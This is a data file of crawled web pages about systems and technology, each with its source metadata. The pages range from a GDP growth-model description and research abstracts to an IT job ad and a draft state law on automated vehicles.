time it takes the server to process the page (displayed at the very bottom of every page). As you can see, RuneTrack's system has become significantly faster from where it was at the beginning of the year, and even just a few months ago, to the point where the load speed really can't get any noticeably faster. With this new server in place, I'd like to reaffirm RuneTrack's promise of providing quick, efficient, and bug-free stat tracking. Thanks again to everyone who's provided feedback about this issue to help solve it, and for all the continued support!
systems_science
https://allahdini.ir/
2022-05-22T19:45:59
s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662546071.13/warc/CC-MAIN-20220522190453-20220522220453-00688.warc.gz
0.935016
320
CC-MAIN-2022-21
webtext-fineweb__CC-MAIN-2022-21__0__7674445
en
Mobin Allahdini H.
I've got my Master's degree in Systems Architecture from Shahid Beheshti University and my B.Sc. in Hardware Engineering from K. N. Toosi University of Technology of Tehran. I am interested in FPGAs and hardware design, and have worked on spike sorting methods with a Spartan-6 FPGA. I have also done research on improving spike sorting accuracy, which resulted in a paper on this subject.
- Mobin Allahdini Hasaroueiye, Dr. Hossein Hosseini-Nejad; An Online Unsupervised Spike Sorting Approach Based on Self Organizing Map. 7th Basic and Clinical Neuroscience Congress, Tehran, Iran, 2018.
- In Jan. 2021 I joined Did Electronic Mobin as a hardware designer. I worked on communication interface protocols like UART and SPI.
- In Dec. 2017, I became a member of the FPGA Lab at K. N. Toosi University of Technology. I worked on brain signals and spikes there. I used Matlab for software simulations and Spartan FPGAs for hardware implementations.
- In 2017 I spent my university internship at Khatoon Abad Copper Smelter Co., working as 1st line IT support.
- In 2014 I worked for Pyramid Co. for 6 months as a trainee software developer. I learned to develop software on several platforms and technologies like C# and WPF.
systems_science
http://www.centennial-group.com/resources/growth-models/
2017-04-26T04:01:01
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917121153.91/warc/CC-MAIN-20170423031201-00067-ip-10-145-167-34.ec2.internal.warc.gz
0.904147
692
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__119888309
en
Repeatable Models to Measure Global GDP Growth
Centennial's models for growth draw scenarios and illustrate the consequences of a diverse range of long-term factors. Our proprietary models can be applied at the global or national levels—and consider a multitude of variables that are economic, policy-related and cultural in nature.
The Centennial Growth Model
GDP (total, per capita, and median per capita) is projected for 187 countries as a Cobb-Douglas function of labor force, capital stock, and total factor productivity. To better capture cohort-specific trends, labor is projected separately for men and women, each for seven age groups, using autoregressions. Capital stock is projected by estimating an initial capital stock for the earliest year possible and then adding yearly investment and subtracting yearly depreciation. For productivity growth, all countries begin with a default growth rate, which represents the advance of global best practice. On top of this, failed states suffer a productivity growth penalty. In addition, research has shown that some growth differences between developing or middle-income countries can be successfully modeled by dividing them into two groups—"non-convergers" experiencing a stagnation of growth and fast-growing "convergers" whose productivity is quickly catching up to global best practice. The latter reflects technology leap-frogging, technology transfers, the diffusion of innovative management and operational research from advanced economies, etc. In the model, converging countries receive a boost in productivity growth. The US is taken as the global best practice, and the further behind the US productivity that a given converger's is, the faster the catch up. For a selected base year, the model generates GDP in constant USD, PPP GDP in constant PPP dollars, and GDP at expected market exchange rates. It projects the latter by estimating movements of a country's real exchange rate. This is calculated by estimating a hypothetical relationship between real exchange rates and the ratio of a country's GDP PPP per capita to that of the US. In the model, a country's actual projected real exchange rate converges towards the point in this hypothetical relationship that corresponds to its income. The model also projects the size of the middle and upper classes using GDP PPP. It assumes an income distribution for each country, distributes the nation's GDP PPP to its citizens accordingly, and estimates what share of the nation's income is available for consumption in order to quantify the size of each class. It also projects poverty and poverty-related indicators, and estimates other income distribution measures such as decile and percentile incomes. It estimates both income and consumption levels, by estimating consumption rates. Additionally, the model can project total bilateral trade between any two countries or regions. It also estimates infrastructure stocks, access, and investment requirements (new capacity, maintenance, and total) for ten sectors: Airports, Electricity, Fixed Broadband, Landlines, Mobile Phones, Ports, Rail, Roads, Sanitation, Water. The model is capable of estimating food consumption (total and per-capita) for various commodities, including Rice, Poultry, Fish, Fish Sauce, Beef, Fruit, Pork, Eggs, Maize, Cassava, Tofu and Sugar. It can also estimate agricultural production. Finally, the model can incorporate assumptions about terms-of-trade changes.
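To make the production-function core of this description concrete, here is a minimal sketch of a one-country projection: Cobb-Douglas output with capital accumulated from investment less depreciation, and a productivity catch-up boost for converging countries. This is not Centennial's actual code, and every parameter value is an illustrative placeholder.

# Minimal sketch of the model's core mechanics (not Centennial's actual code).
# GDP is a Cobb-Douglas function of capital, labor, and total factor productivity;
# all parameter values below are illustrative placeholders.
def project_gdp(years, capital0, labor, tfp0, investment_rate=0.25,
                depreciation=0.05, alpha=0.35, base_tfp_growth=0.01,
                converger=False, catchup_bonus=0.02):
    capital, tfp, path = capital0, tfp0, []
    for t in range(years):
        gdp = tfp * capital**alpha * labor[t]**(1 - alpha)    # Cobb-Douglas output
        path.append(gdp)
        # capital stock: add yearly investment, subtract yearly depreciation
        capital += investment_rate * gdp - depreciation * capital
        # productivity: default best-practice growth plus a catch-up boost for convergers
        tfp *= 1 + base_tfp_growth + (catchup_bonus if converger else 0.0)
    return path

# Toy run: a constant labor force of 10 million over 5 years
labor = [10e6] * 5
print(project_gdp(5, capital0=1e9, labor=labor, tfp0=1.0, converger=True))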
systems_science
http://methodist.edu/jenzabar
2019-09-19T19:01:07
s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514573570.6/warc/CC-MAIN-20190919183843-20190919205843-00120.warc.gz
0.913405
438
CC-MAIN-2019-39
webtext-fineweb__CC-MAIN-2019-39__0__183312960
en
Database Administrator: Mary L. Hupp Title III Grant Directive: Jenzabar Integrated Information Management System: The introduction of an integrated information management system will enable MU to engage our constituents (students, faculty, staff, and administrators) with one another in ways never before possible at our institution. Our inability to communicate timely, critical information across division and departmental lines and our lack of capacity to share decision-making information with our students is a primary barrier to student retention, success, and satisfaction. As part of our strategic planning, an MU task force appointed by the President, consisting of administrators, faculty, and staff, looked critically at our information system capacity and then began researching and interviewing possible vendors for an integrated system. Task force members unanimously recommended the Jenzabar Enterprise Management System (EMS), a system with a demonstrated track record of success at institutions similar to MU. We will begin by upgrading technology infrastructure including essential hardware (servers and uninterruptible power supplies), back-up hardware (one data domain), data storage software, and server software. All labor will be completed by the Office of Institutional Computing (OIC) without federal funding. Year-1 also will include initial data conversion activities and preliminary staff orientation and training. Jenzabar will assign a project liaison who will work with the Title III Database Manager to effect a two-year mapping, testing, and conversion process. Faculty and staff training provided by Jenzabar, beginning in Year-1, will continue (with expanded applications) through Year-3. Primary conversion will include offices that directly impact students: admissions, registration, advising, student life, financial aid, and the major business management and reporting functions. In Year-2, end-user potential increases as we add an attendance module to alert students, faculty, and advisors of prospective retention problems. By Year-3, attention turns to the Constituent Relations Modules (CRM's) enabling students and faculty to utilize fully the potential of the EMS to communicate and share information. Faculty Advising procedures and strategies also will be revised in Year-3, strengthening both student-faculty relationships and student academic planning.
systems_science
https://www.math.colostate.edu/~bangerth/index.html
2023-09-22T10:49:00
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233506399.24/warc/CC-MAIN-20230922102329-20230922132329-00407.warc.gz
0.926641
524
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__166228333
en
Who I am
After having studied in Stuttgart and Heidelberg (Germany); a Ph.D. in Heidelberg; a stop at ETH Zürich (Switzerland); a postdoc at the University of Texas at Austin (with joint positions at the Oden Institute for Computational Engineering and Sciences and the Institute for Geophysics); and eleven years as a Professor of Mathematics at Texas A&M University, I am now a professor in the Department of Mathematics and a professor (by courtesy) in the Department of Geosciences at Colorado State University. I am also a co-Editor-in-Chief of the ACM Transactions on Mathematical Software (TOMS). I consider myself a computational scientist. My field of work is developing methods and widely usable software for the numerical solution of partial differential equations by the finite element method – or, in different words: I develop the mathematical and software tools for simulating how solids, fluids, and gases move and deform. If you are interested in more about this, check out the links at the top of this page.
Finite element software
The concrete realization of my work is software. This includes deal.II, a finite element software library written in C++. I am the founder and, with others, principal author and maintainer of this open source library. deal.II is used by several hundred researchers around the world and is part of the computing industry standard SPEC CPU2006 and SPEC CPU2017 benchmarks. My co-authors and I have received the J. H. Wilkinson Prize for Numerical Software for its creation. It has been used for numerical results in about 1,800 scientific papers covering practically all areas of the sciences and engineering. I wrote the basic blocks of this library in 1998 for my thesis, but it has been greatly extended since, by me and around 300 others around the world. It now has about 1,400,000 lines of code, and extensive documentation. I am also a principal author of ASPECT, an open source code for thermal convection with primary application to the simulation of convection in the Earth mantle. ASPECT is the basis of the integrated earth project of which I am the Principal Investigator.
bangerth @ colostate.edu
Cell phone: +1 (512) 689 7194
Department of Mathematics
1874 Campus Delivery
Fort Collins, CO 80523-1874
systems_science
https://kascomarine.com/employment/system-administrator/
2024-04-13T06:37:31
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816586.79/warc/CC-MAIN-20240413051941-20240413081941-00370.warc.gz
0.895069
1,024
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__36339322
en
Kasco Marine is seeking a full-time System Administrator at our home office in Prescott, WI. The System Administrator is a member of Kasco's Shared Services team and is responsible for maintaining the technologies and systems that support our business operations. This is a key role tasked with enabling teams throughout the company and supporting business-critical systems. This role requires both the ability to dive deep into detail and take the broad view necessary to ensure that our systems are properly maintained and that we are realizing the full potential of our technology tools. The Sysadmin will be the primary point of contact in Kasco's relationships with key technology partners, serving as a strong advocate for the company in discussions about the hardware, software, and systems that support our business. The ideal candidate will bring curiosity and a willingness to learn the business from every angle so that they can advise on best practices and contribute meaningfully to process improvement efforts. Kasco is a growing company, and this is a chance for the right person to step in and ensure that our systems not only keep pace but anticipate and enable our future growth. Essential Job Responsibilities - Maintain essential IT infrastructure, including operating systems, security tools, applications, servers, email systems, firewalls, phones, printers, laptops, desktops, and other hardware. - Perform Windows server administration tasks; help build, test, and maintain new servers. - Take responsibility for individual projects and tasks within larger business initiatives. - Monitor network security and perform regular tests; ensure security through access controls, backups, and firewalls. - Monitor data-center health and respond to hardware issues as they arise. - Serve as Kasco's point person in our relationships with IT partners and contractors. - Work with internal and external partners to communicate project status and activities; manage upgrades, new releases. - Assist in addressing or routing help desk tickets with Kasco's technology partners; troubleshoot issues and outages. - Provide technical support to employees; develop expertise to train staff on new technologies. - Build and maintain technical documentation, manuals, and IT policies. - Drive the management of users/groups, security permissions, group policies, print services, and monitoring resources. - Maintain networks and network file systems; end-to-end support of internet, intranet, and databases. - Perform routine and scheduled audits of all systems, including backups; maintain network integrations and connections. - Upgrade, install, and configure application software and computer hardware. - Coordinate and carry out workstation setup for employees in all departments. - Proven success in an IT role, preferably in system or network administration. - O365 admin experience. - Experience with or knowledge of operating systems, current equipment and technologies, enterprise backup and recovery procedures, systems performance-monitoring tools, active directories, and virtualization. - Knowledge of system security (e.g. intrusion detection systems) and data backup/recovery. - Familiarity with various operating systems and platforms. - Resourcefulness and commitment to problem solving and process improvement. - BS/BA in Information Technology, Computer Science or a related discipline. - Professional certification (e.g. Microsoft Certified Systems Administrator (MCSA)). - Proficient in Microsoft Office.
- Experience working with an ERP system. - Excellent verbal and written communication across all levels of the organization. - Works well under pressure; strong ability to multi-task and be a team player. - Must be a self-starter with a positive attitude and willingness to learn. - Ability to work effectively both independently and with a team and with multiple interruptions throughout the day. Requires occasional lifting of materials up to 40lbs. Required to sit or stand for long periods of time. Eligible employees are offered a competitive benefits package including: - Medical/dental/life/STD/LTD insurances - Paid time off - Paid holidays - Profit sharing - Advancement opportunities Send resume and cover letter to [email protected]. Kasco Marine is an Equal Opportunity Employer. About the Company Kasco Marine is a leading international supplier and innovator in the manufacture of aerators, diffused aeration, floating decorative fountains, de-icing products, circulators, and tank mixers. Kasco has a well-established reputation for quality products offered to the residential, aquaculture, commercial, industrial, municipal, public area, resort, and institutional industries. Kasco has been in business for over 50 years and is a small but aggressive and growing company located in Prescott, WI. We are dedicated to delivering exceptional service and support to our customers and creating an atmosphere of continuous improvement where everyone’s voice is heard.
systems_science
https://repozitorij.foi.unizg.hr/islandora/object/foi%3A3575
2024-03-03T11:55:05
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476374.40/warc/CC-MAIN-20240303111005-20240303141005-00886.warc.gz
0.79595
1,587
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__25899720
en
The rapid development of information technology has given rise to complex systems such as cloud computing. These systems usually have to provide a high level of data availability, i.e. they must ensure the uninterrupted operation of business systems. Achieving this entails the high capital and operational costs of the data centers that are indispensable for this type of service. Numerous studies on this topic indicate that servers are the main cause of the high costs of data centers, which is why their resources should be used as efficiently as possible. The research cites Web farms as a practical example confirming that there are systems whose servers underuse their resources but must nevertheless have them in order to guarantee a high level of system availability. The aforementioned high costs and the insufficient utilization of existing computing resources are the main motivation for this research. After studying the existing scientific research, as well as solutions from practice, it was established that no existing solution addresses this problem effectively enough. The thesis proposes a new model for automated and improved utilization of existing computing resources without the need to restart the server, which solves the stated problem. Based on the model, an application was built and validated on the example of a Web server, where this problem was recognized. The research uses the Design Science Research Methodology (DSRM) paradigm, which is based on the creation of a new artifact, in this case the new model.
Information technology is under constant innovation pressure to provide the highest level of data availability, i.e. the continuous functioning of operating systems. This is the very reason for an accelerated development of complex systems called cloud computing. One of the tasks of such solutions is to ensure high-level availability of complex systems and architecture. In order for such solutions to function properly, the high capital and operational costs of data centers are essential for this type of service. There are numerous studies which indicate that servers are the main cause of data centers' high cost. As a result, the aim is to use servers, i.e. their resources more efficiently. This paper shows the examples from practice which confirm that there are systems whose servers insufficiently exploit their resources, but they must have them due to their importance. A concrete example of this problem are the Web Farms where, in order to achieve greater system availability, there is a greater amount of resources than is really needed, as confirmed by tools for measuring server loads. This approach allows the system to withstand sudden loads, which increases the level of system availability. The negative effect of such an approach is the increase in capital and operating costs due to a higher amount of computer resources. The mentioned high costs and inadequate utilization of the existing computer resources are at the same time the main motivation for this research. To solve this problem, it is necessary to have a system which would automatically allocate as much computer resources as the system needs, depending on its load and thereby taking into account its availability and consistency.
During a detailed study of the current scientific research, as well as practical solutions, it has been found that there is no effective solution to this problem, which also served as an additional motivation for this research to be carried out. The existing solutions are lacking in that they are not dealing with how to use the existing resources more efficiently, but in adding new or migrating virtual servers to other physical servers in critical situations, which requires even larger numbers of computer resources. The second approach to solving this problem is process prioritization, i.e. that servers with the greatest need for resources are given the highest priority in the execution of the process. The disadvantage of this approach is that resources cannot be increased nor decreased, but only prioritized, which still results in the presence of unused resources. One of the disadvantages of the existing solutions is that it is not possible to add and subtract computer resources (CPU and memory) without the need to restart the server. A large number of existing solutions focus only on CPU or memory, but not on both. Due to all this, a decision was made to build a new model for an automated and improved utilization of the existing computing resources. The model will be verified by building an application that will also serve for validation on the Web server example where this problem was recognized. The research paradigm used in this research is the Design Science Research Methodology (DSRM), which has specific guidelines for evaluation and iteration within research projects. The methodology is based on the creation of a new artifact. In this case that is a new model which addresses these complex problems mentioned in this case. The Design Science Research Methodology consists of six sequential process steps, which are: identification of problems and motivations, a definition of goals, design, and development, presentation of solutions, evaluation and communication. Throughout these steps, numerous methods and techniques were used such as: comparison, evaluation/validation, content analysis, experiment, modelling techniques (UML), diagram techniques (causal relationship diagrams), structural analysis of processes (decomposition diagrams, data flow charts, and block diagram), programming (pseudocode and scripting languages (BASH and PHP), as well as many others. With regard to scientific contributions, this research has resulted with a new model for an automated and improved utilization of the existing computing resources without the need to restart the server, as well as in clearly defined cases and constraints regarding the new model’s application. The research has shown that the application of a new model enables a more efficient utilization of the existing computing resources (CPU and memory) without the need to restart the server. The research also provides recommendations for the implementation of the model in the selected programming language, and the process of evaluating the model in the experiments. In view of the social contribution, the whole solution is open source, which is also one of the main goals of this research. This results in an easier application of the solution and the repeatability of the testing to facilitate further improvement and research on this topic.
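To make the idea of the proposed model more concrete, here is a minimal sketch of the kind of control loop the thesis describes: periodically compare a server's measured load against thresholds and grow or shrink its CPU allocation at runtime, without a restart. This is not the thesis's actual implementation (which was built with BASH and PHP scripting); the thresholds and the helpers get_cpu_utilization, get_vcpu_count, and set_vcpu_count are hypothetical placeholders for whatever hot-plug or cgroup mechanism the platform exposes.

```python
# Sketch of an automated resource-utilization loop (assumptions noted above).
import time

CPU_HIGH, CPU_LOW = 0.80, 0.30      # utilization thresholds for scaling up/down (arbitrary)
MIN_VCPUS, MAX_VCPUS = 1, 16

def get_cpu_utilization(server: str) -> float:
    """Hypothetical: return average CPU utilization (0.0-1.0) of the server."""
    raise NotImplementedError

def get_vcpu_count(server: str) -> int:
    """Hypothetical: return the number of vCPUs currently assigned."""
    raise NotImplementedError

def set_vcpu_count(server: str, vcpus: int) -> None:
    """Hypothetical: apply a new vCPU count to the running server, no reboot."""
    raise NotImplementedError

def autoscale(server: str, interval: int = 10) -> None:
    while True:
        load = get_cpu_utilization(server)
        vcpus = get_vcpu_count(server)
        if load > CPU_HIGH and vcpus < MAX_VCPUS:
            set_vcpu_count(server, vcpus + 1)      # scale up under pressure
        elif load < CPU_LOW and vcpus > MIN_VCPUS:
            set_vcpu_count(server, vcpus - 1)      # release unused resources
        time.sleep(interval)
```

The same loop can be extended to memory, which is the other resource the model targets; the key design point is that allocation changes are applied to the live server rather than by reprovisioning or migrating it.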
systems_science
https://orbis.uaslp.mx/vivo/display/scopus9231
2024-03-03T01:56:59
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476180.67/warc/CC-MAIN-20240303011622-20240303041622-00494.warc.gz
0.927029
335
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__70045113
en
Photomechanical polymer nanocomposites for drug delivery devices
We demonstrate a novel structure based on smart carbon nanocomposites intended for fabricating laser-triggered drug delivery devices (DDDs). The performance of the devices relies on nanocomposites' photothermal effects that are based on polydimethylsiloxane (PDMS) with carbon nanoparticles (CNPs). Upon evaluating the main features of the nanocomposites through physicochemical and photomechanical characterizations, we identified the main photomechanical features to be considered for selecting a nanocomposite for the DDDs. The capabilities of the PDMS/CNPs prototypes for drug delivery were tested using rhodamine-B (Rh-B) as a marker solution, allowing for visualizing and quantifying the release of the marker contained within the device. Our results showed that the DDDs readily expel the Rh-B from the reservoir upon laser irradiation and the amount of released Rh-B depends on the exposure time. Additionally, we identified two main Rh-B release mechanisms, the first one is based on the device elastic deformation and the second one is based on bubble generation and its expansion into the device. Both mechanisms were further elucidated through numerical simulations and compared with the experimental results. These promising results demonstrate that an inexpensive nanocomposite such as PDMS/CNPs can serve as a foundation for novel DDDs with spatial and temporal release control through laser irradiation. © 2021 by the authors. Licensee MDPI, Basel, Switzerland.
systems_science
http://oakston.com/telecommunications
2023-09-27T07:19:15
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233510284.49/warc/CC-MAIN-20230927071345-20230927101345-00743.warc.gz
0.905009
196
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__220084906
en
OAKSTON Technologies has helped the telecommunications service providers and infrastructure suppliers to gain cost savings, time-to-market efficiency, improved quality and productivity. OAKSTON Technologies provides technology products, solutions and technology consulting services to a wide range of telecommunications service providers and infrastructure providers worldwide. We have combined our telecommunications industry business acumen with our proven global delivery methodology to rapidly and inexpensively deploy state-of-the-art solutions that resolve core business issues for our telecommunications clients. Intelligent Networks (IN) and Next Generation Networks (NGN) OAKSTON Technologies provides a suite of products, customized solutions and systems integration services in the domain of Intelligent Networks (IN) and Next Generation Networks (NGN). Our products and customized solutions are deployed on the Service Control Point (SCP) and Application Server (AS) in the IN and NGN architectures respectively and provide value-added services to subscribers in the wireline, wireless and convergent segments of the telecommunications market.
systems_science
http://areyoufakenews.com/
2022-09-30T11:11:31
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335448.34/warc/CC-MAIN-20220930082656-20220930112656-00760.warc.gz
0.907995
191
CC-MAIN-2022-40
webtext-fineweb__CC-MAIN-2022-40__0__107516155
en
This project aims to classify the bias in news media in real time. With the help of labeled data created by open source projects opensources.co and mediabiasfactcheck.com which document bias in thousands of news sources, a model of what makes a source biased is constructed to classify new information. This project periodically collects tens of thousands of articles from the labeled news sources and trains a custom-built neural network on the articles in order to model and characterize bias. When a user visits this site and submits a news website url for analysis, a system of EC2 instances and AWS Lambda functions gathers a few dozen of the latest articles from the site. The collected text is sent to the neural network model residing in an AWS Lambda function, and the results are rendered in matplotlib and published via flask. This project is under continued development as UX, data visualization and modeling are expanded and refined.
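As a rough illustration of the request flow described above, the sketch below shows what the analysis endpoint might look like as a minimal Flask service. The functions fetch_recent_articles and score_bias are hypothetical stand-ins for the project's scraper and trained neural network, and the AWS Lambda/EC2 orchestration is omitted; this is not the site's actual code.

```python
# Hypothetical sketch: accept a news-site URL, score recent articles, return an aggregate.
from flask import Flask, jsonify, request

app = Flask(__name__)

def fetch_recent_articles(site_url: str, limit: int = 30) -> list[str]:
    """Hypothetical: return the text of the latest articles from the site."""
    raise NotImplementedError

def score_bias(text: str) -> float:
    """Hypothetical: return a bias score in [0, 1] from the trained model."""
    raise NotImplementedError

@app.route("/analyze", methods=["POST"])
def analyze():
    site_url = request.get_json()["url"]
    articles = fetch_recent_articles(site_url)
    scores = [score_bias(a) for a in articles]
    return jsonify({
        "url": site_url,
        "articles_scored": len(scores),
        "mean_bias_score": sum(scores) / len(scores) if scores else None,
    })

if __name__ == "__main__":
    app.run()
```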
systems_science
https://www.newsminimalist.com/articles/336d42f6-059a-4ce3-9f6c-753e893b94c4
2024-04-13T04:20:16
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816535.76/warc/CC-MAIN-20240413021024-20240413051024-00727.warc.gz
0.873006
114
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__38470922
en
Moon Surgical's Maestro System enhances laparoscopies with ScoPilot Summary: Moon Surgical's Maestro System, powered by NVIDIA's Holoscan, introduces the ScoPilot feature for laparoscopies, enabling surgeons to control the laparoscope independently. Over 200 patients have benefited from this technology, enhancing surgical fluidity and speed. The system's AI capabilities aim to revolutionize the operating room experience, with NVIDIA's platform supporting real-time AI algorithms during surgery. Surgeons and patients stand to benefit from these innovative advancements.
systems_science
https://www.jerseywaterworks.org/tools-resources/effective-green-gray-infrastructure/page/10/
2018-11-17T15:21:27
s3://commoncrawl/crawl-data/CC-MAIN-2018-47/segments/1542039743714.57/warc/CC-MAIN-20181117144031-20181117165402-00037.warc.gz
0.871816
513
CC-MAIN-2018-47
webtext-fineweb__CC-MAIN-2018-47__0__51447866
en
Successful and Beneficial Green Infrastructure Most people are familiar with “gray” water infrastructure — the hard, concrete and metal pipes, holding tanks, pumps, water tunnels, and treatment plants. These systems play a key role in managing drinking water, wastewater and combined-sewer systems. “Green” infrastructure is a newer approach to stormwater management that mimics nature by capturing stormwater so it can either be reused or seep into the ground where it falls, rather than flowing into underground sewer and storm pipes. Methods for stormwater capture include rain gardens, pervious pavement, planted swales, and storage containers such as cisterns and rain barrels. Green-infrastructure features can help reduce stress on water systems and can provide good local jobs, as well as making the communities where they’re installed healthier and more beautiful. Both gray and green infrastructure are important components of water infrastructure systems statewide. Communities with combined sewer systems in particular will be evaluating gray- and green-infrastructure approaches to come up with the best combination that meets regulatory requirements cost-effectively and in a manner that provides tangible community benefits. Historic Water: Re-imaging Hobokens Engineered Landscape This report explores different stormwater interventions within an open-space network that incorporates stormwater infrastructure and the landscape. New Jersey Future. 2013. Hoboken Columbia – IRS Mixed Use Water Infrastructure This report presents potential green and gray infrastructure design strategies developed to determine the appropriate combinations of green and grey infrastructure based upon cost, social impact, and magnitude of desired flood prevention for the City of Hoboken. Spring 2012. Charting New Waters: Developing an Agenda for Change for New Jersey’s Urban Water Infrastructure This report provides The Johnson Foundation at Wingspread’s comprehensive description of the 2014 convening that spawned the Agenda for Change and synthesizes the broader range of information, insights and ideas shared during the convening. 2014. Low Impact Development (LID) As a Solution to the CSO Problem In the NY-NJ Harbor Estuary This policy brief, from NY/NJ Baykeeper, reviews legislation, case studies and technologies to make the case for the use of Low Impact Development practices to reduce stormwater flows in combined sewer systems in municipalities. Hoboken City Hall Sustainable Stormwater Demonstration Project Concept Plan This plan demonstrates how to capture stormwater runoff from Hoboken’s City Hall by using green and gray infrastructure. City of Hoboken. 2013.
systems_science
https://sonarcn.com/software-development-unveiled-decoding-the-digital-universe/
2024-02-28T16:55:19
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474737.17/warc/CC-MAIN-20240228143955-20240228173955-00696.warc.gz
0.906435
461
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__199900926
en
In the fast-paced realm of technology, software development stands as the cornerstone of innovation, orchestrating the transformation of ideas into tangible digital solutions. It is the process of designing, coding, testing, and maintaining software applications, enabling computers to perform tasks that range from simple calculations to complex artificial intelligence algorithms. At its core, software development is a symphony of human creativity, logical thinking, and problem-solving. It encompasses a multitude of programming languages, each with its unique syntax and purpose, providing developers with a diverse toolkit to craft applications tailored to specific needs. Central to custom software development is the iterative process. It begins with conceptualizing the idea, dissecting it into manageable components, and outlining the architecture. Next, developers dive into writing code, a language that computers comprehend, instructing them on how to execute tasks. This is where creativity meets precision, as developers craft algorithms, loops, and conditional statements to breathe life into their concepts. Simultaneously, testing is paramount. Rigorous examination of the code for bugs, glitches, and performance issues ensures a robust, reliable product. This quality assurance phase often involves various methodologies, including unit testing, integration testing, and user acceptance testing. It is a meticulous process, vital for delivering software that meets or exceeds user expectations. Moreover, the digital landscape is ever-evolving, demanding adaptability from developers. Agile methodologies have emerged as a beacon, emphasizing flexibility and collaboration. Teams work in sprints, allowing them to respond swiftly to changing requirements and deliver incremental updates. This iterative approach promotes a dynamic development environment, where feedback loops fuel continuous improvement. The digital universe, as we know it, thrives on a multitude of software ecosystems. From mobile applications that streamline daily life to enterprise-level systems that power global corporations, software development is ubiquitous. It has revolutionized industries, enabling automation, artificial intelligence, and the Internet of Things to reshape the way we live and work. In conclusion, software development is the engine propelling the digital age forward. It marries human ingenuity with computational prowess, birthing applications that empower individuals and organizations alike. As we continue to decode the digital universe, the journey of software development remains an exhilarating exploration of boundless possibilities.
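To make the quality-assurance point above concrete, here is a deliberately tiny, hypothetical example of a unit test written with pytest. It is illustrative only and not tied to any particular project: the test exercises both the typical case and an edge case before the function ships.

```python
# Minimal pytest-style unit test example (illustrative only).
import pytest

def average(values):
    """Return the arithmetic mean of a non-empty list of numbers."""
    if not values:
        raise ValueError("average() requires at least one value")
    return sum(values) / len(values)

def test_average_typical_case():
    assert average([2.0, 4.0, 6.0]) == 4.0

def test_average_rejects_empty_input():
    with pytest.raises(ValueError):
        average([])
```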
systems_science
https://newlypossible.org/w/index.php?title=Model_State_Automated_Driving_Law&direction=next&oldid=32
2022-01-21T11:19:18
s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320303356.40/warc/CC-MAIN-20220121101528-20220121131528-00661.warc.gz
0.923591
1,733
CC-MAIN-2022-05
webtext-fineweb__CC-MAIN-2022-05__0__211691463
en
Model State Automated Driving Law
- It is the intent of the Legislature to facilitate the development and deployment of automated driving in a way that improves highway safety.
- The Legislature hereby finds that the automated operation of an automated vehicle under the conditions prescribed herein is consistent with article 8 of the Convention on Road Traffic because automated driving systems perform the operational and tactical functions otherwise performed by conventional drivers and have the potential to advance an object of the Convention by significantly improving highway safety.
- The Department of Motor Vehicles and the Department of Insurance may make rules, issue interpretations, and take other lawful actions to administer and enforce this Act.
- Automated driving provider means the natural or legal person that for the purpose of registering an automated vehicle warrants that the automated operation of such vehicle is reasonably safe.
- Automated driving system means the hardware and software that are collectively capable of performing the entire dynamic driving task on a sustained basis.
- Automated operation means the performance of the entire dynamic driving task by an automated driving system, a remote driver, or a combination of automated driving system and remote driver. Automated operation begins at the moment of such performance and continues until the moment that a driver or operator intentionally terminates such performance for a reason other than a reasonable perception of imminent harm.
- Automated operation insurance means an insurance policy that covers damages to the person or property of another arising from the automated operation of an automated vehicle without regard to fault.
- Automated vehicle means a motor vehicle with an automated driving system, regardless of whether the vehicle is under automated operation.
- Automated vehicle owner means the owner of the automated vehicle, as the term owner is defined in this Title.
- Automation continuation guarantee means a surety bond or cash deposit that specifically covers diminution in the value of an automated vehicle arising from revocation of that vehicle's registration.
- Dedicated automated vehicle means an automated vehicle designed for exclusively automated operation.
- Drive and operate each mean as provided in the vehicle code, except that an automated driving system exclusively drives and operates a vehicle under automated operation.
- Driver and operator each mean as provided in the vehicle code, except that an automated driving system is the exclusive driver and operator of a vehicle under automated operation.
- Dynamic driving task means all of the real-time operational and tactical functions required to operate a vehicle in on-road traffic, excluding the strategic functions such as trip scheduling and selection of destinations and waypoints, and including without limitation controlling lateral vehicle motion, controlling longitudinal vehicle motion, monitoring the driving environment, executing responses to objects and events, planning vehicle maneuvers, and enhancing vehicle conspicuity.
- Participating agency means the Department of Motor Vehicles, an administrative agency of another state that shares automated vehicle registration information with this State, or an administrative agency of the United States that shares automated vehicle registration information with this State.
- Remote driver means a natural person who performs part of or the entire dynamic driving task while not seated in a position to manually exercise in-vehicle braking, accelerating, steering, and transmission gear selection input devices.
- A person who uses an automated vehicle without driving or operating such vehicle shall not be required to hold a driving license.
- A remote driver shall hold a driving license that is valid in this State.
- A remote driver who is employed, contracted, or compensated as such shall hold a commercial driving license that is valid in this State.
- An automated vehicle owner may register an automated vehicle in this State regardless of whether such owner is a resident thereof.
- An automated vehicle owner shall register an automated vehicle in this State if such vehicle travels more than 80 percent of its miles therein as measured on a calendar year basis.
- Registration of an automated vehicle may be granted, maintained, and renewed only if, by means of a current electronic record automatically retrievable by any participating agency, an automated driving provider:
- identifies such vehicle by vehicle identification number;
- describes the capabilities and limitations of such vehicle's automated driving system;
- provides proof of automated operation insurance for such vehicle;
- provides proof of any required automation continuation guarantee for such vehicle;
- represents to each participating agency that it believes the automated operation of such vehicle to be reasonably safe;
- represents to each participating agency that clear and convincing evidence supports such belief;
